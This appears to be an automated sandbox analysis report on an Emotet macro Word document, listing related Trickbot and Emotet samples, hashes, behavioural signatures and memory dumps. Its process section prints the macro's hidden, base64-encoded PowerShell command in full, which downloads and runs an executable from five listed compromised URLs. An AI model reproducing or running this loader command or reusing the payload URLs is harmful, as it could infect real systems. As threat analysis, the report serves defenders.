Overview
overview
10Static
static
8client/202...st.exe
windows7-x64
10client/202...st.exe
windows10-2004-x64
10client/202...-2.doc
windows7-x64
10client/202...-2.doc
windows10-2004-x64
10client/202...on.exe
windows7-x64
10client/202...on.exe
windows10-2004-x64
10client/202...ro.exe
windows7-x64
10client/202...ro.exe
windows10-2004-x64
10client/gpu...3C.exe
windows7-x64
10client/gpu...3C.exe
windows10-2004-x64
10client/gpu...rt.exe
windows7-x64
10client/gpu...rt.exe
windows10-2004-x64
10dc/gpuheal...rt.exe
windows7-x64
10dc/gpuheal...rt.exe
windows10-2004-x64
10Analysis
-
max time kernel
102s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2022 19:37
Behavioral task
behavioral1
Sample
client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral3
Sample
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
Resource
win10v2004-20221111-en
Behavioral task
behavioral5
Sample
client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe
Resource
win7-20220901-en
Behavioral task
behavioral10
Sample
client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral11
Sample
client/gpuhealth/syrecrt.exe
Resource
win7-20220812-en
Behavioral task
behavioral12
Sample
client/gpuhealth/syrecrt.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
dc/gpuhealth/syrecrt.exe
Resource
win7-20221111-en
General
-
Target
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
-
Size
248KB
-
MD5
33285762e4d622f59232275df1f8c895
-
SHA1
9453e78df31d27a75141b298f256fb26c8cd473c
-
SHA256
7a8cb80805617a8ba3c67dca2a80527c17601869e833272758ea10ef5926b29f
-
SHA512
2fa25ab449522106249c7a62581148ee9a32d5aa0c0f7dd2a2f4fa79a8b2ac529ad287be84c95e8bc5b0f266307989874bdbaf9fd2ed5cb8c509093af8040231
-
SSDEEP
6144:p0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+RC/uY+KSX:p0E3dxtR/iU9mvUPMR+KSX
Malware Config
Extracted
http://www.lakshmichowkusa.com/emailwishlist/g3B/
http://adampettycreative.com/x92k25/387wj2/
https://backerplanet.com/forum_posts/0i7/
http://hebreoenlinea-chms.mx/wp-content/sW0yhVry/
https://formaper.webinarbox.it/admin/Kb/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 220 4592 powershell.exe -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 18 220 powershell.exe 20 220 powershell.exe 26 220 powershell.exe 28 220 powershell.exe 43 220 powershell.exe 54 220 powershell.exe 56 220 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4092 WINWORD.EXE 4092 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 220 powershell.exe 220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 220 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE 4092 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\client\2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgBpAHcAYwBqAGwAZQBxAG0AbgBnACcAOwAkAEUAcABxAHcAagBlAHQAeABpAGMAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACsAJwAuAGUAeABlACcAOwAkAEkAYQBrAG4AcQBiAGIAeQBlAGoAZQBxAD0AJwBTAHQAaABoAGwAawBpAHgAJwA7ACQAQQB5AG8AdwBlAGYAYQBtAGsAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAQwBsAGkAZQBuAHQAOwAkAFAAZgBuAHUAaABrAG8AbwB6AD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AbABhAGsAcwBoAG0AaQBjAGgAbwB3AGsAdQBzAGEALgBjAG8AbQAvAGUAbQBhAGkAbAB3AGkAcwBoAGwAaQBzAHQALwBnADMAQgAvACoAaAB0AHQAcAA6AC8ALwBhAGQAYQBtAHAAZQB0AHQAeQBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAHgAOQAyAGsAMgA1AC8AMwA4ADcAdwBqADIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAGUAcgBwAGwAYQBuAGUAdAAuAGMAbwBtAC8AZgBvAHIAdQBtAF8AcABvAHMAdABzAC8AMABpADcALwAqAGgAdAB0AHAAOgAvAC8AaABlAGIAcgBlAG8AZQBuAGwAaQBuAGUAYQAtAGMAaABtAHMALgBtAHgALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwBXADAAeQBoAFYAcgB5AC8AKgBoAHQAdABwAHMAOgAvAC8AZgBvAHIAbQBhAHAAZQByAC4AdwBlAGIAaQBuAGEAcgBiAG8AeAAuAGkAdAAvAGEAZABtAGkAbgAvAEsAYgAvACcALgAiAHMAYABwAEwASQBUACIAKAAnACoAJwApADsAJABTAGwAYwBmAGIAZgBiAGwAZAA9ACcAWABjAHIAdgB4AHIAdQB3AHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFIAeABoAGsAeABxAHgAYwAgAGkAbgAgACQAUABmAG4AdQBoAGsAbwBvAHoAKQB7AHQAcgB5AHsAJABBAHkAbwB3AGUAZgBhAG0AawAuACIARABPAHcAbgBgAEwATwBBAGQAZgBgAEkAYABsAGUAIgAoACQAUgB4AGgAawB4AHEAeABjACwAIAAkAEUAcABxAHcAagBlAHQAeABpAGMAbgApADsAJABQAGoAbAB3AGUAZgB2AGIAagBrAD0AJwBWAGYAeQB3AHgAegBoAHQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAHAAcQB3AGoAZQB0AHgAaQBjAG4AKQAuACIAbABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAyADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQBSAHQAIgAoACQARQBwAHEAdwBqAGUAdAB4AGkAYwBuACkAOwAkAFYAcgBwAGwAbwB0AG4AYQBjAHEAZgB3AD0AJwBFAGEAdwBxAGIAegB3AHkAegB3AHEAegAnADsAYgByAGUAYQBrADsAJABYAHIAeQB6AGUAbwBxAGUAbwB1AGcAaQB2AD0AJwBMAHAAagBlAGMAcwB5AGwAYwBrAGwAeAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAcAB5AHAAZABrAHMAZwBzAGUAZAB6AD0AJwBKAHQAZABuAGIAbgBnAGgAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/220-139-0x00000193EC3E0000-0x00000193EC402000-memory.dmpFilesize
136KB
-
memory/220-143-0x00007FFB5F680000-0x00007FFB60141000-memory.dmpFilesize
10.8MB
-
memory/220-142-0x00007FFB5F680000-0x00007FFB60141000-memory.dmpFilesize
10.8MB
-
memory/220-141-0x00007FFB5F680000-0x00007FFB60141000-memory.dmpFilesize
10.8MB
-
memory/4092-140-0x00000207C9210000-0x00000207C9214000-memory.dmpFilesize
16KB
-
memory/4092-137-0x00007FFB49200000-0x00007FFB49210000-memory.dmpFilesize
64KB
-
memory/4092-138-0x00007FFB49200000-0x00007FFB49210000-memory.dmpFilesize
64KB
-
memory/4092-136-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-132-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-135-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-134-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-133-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-145-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-146-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-147-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB
-
memory/4092-148-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmpFilesize
64KB